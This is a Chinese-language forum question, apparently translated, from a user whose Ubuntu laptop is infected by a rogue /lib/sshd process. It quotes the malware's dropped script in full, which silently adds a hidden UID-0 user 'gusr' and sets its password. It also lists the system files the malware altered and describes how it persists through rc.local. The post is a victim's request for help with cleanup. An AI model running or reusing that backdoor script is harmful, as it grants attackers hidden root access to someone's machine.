如何处理笔记本电脑上的恶意软件?
我相当确定我的Ubuntu 13.10笔记本电脑感染了某种恶意软件。 每隔一段时间,我会发现一个进程/ lib / sshd(由root拥有)正在运行并消耗大量cpu。不是运行/ usr / sbin / sshd的sshd服务器。 二进制文件具有--wxrw-rwt权限,并且在/ lib目录中生成并生成脚本。最近的一个名为13959730401387633604,它执行以下操作 #!/bin/sh exec 1>/dev/null exec 2>/dev/null useradd -g 0 -u 0 -o gusr echo gusr:chaonimabi123456123 | chpasswd gusr用户是由恶意软件独立创建的,然后chpasswd挂起,而占用了100%的cpu。 到目前为止,我已经确定gusr用户已另外添加到/ etc /中的文件中。 /etc/group /etc/gshadow /etc/passwd /etc/shadow /etc/subgid /etc/subuid 似乎该恶意软件使用“-”后缀复制了所有这些文件。由root修改的/ etc /文件的完整列表在此处。 此外,/ etc / hosts文件已更改为this。 / lib / sshd首先将自身添加到/etc/init.d/rc.local文件的末尾! …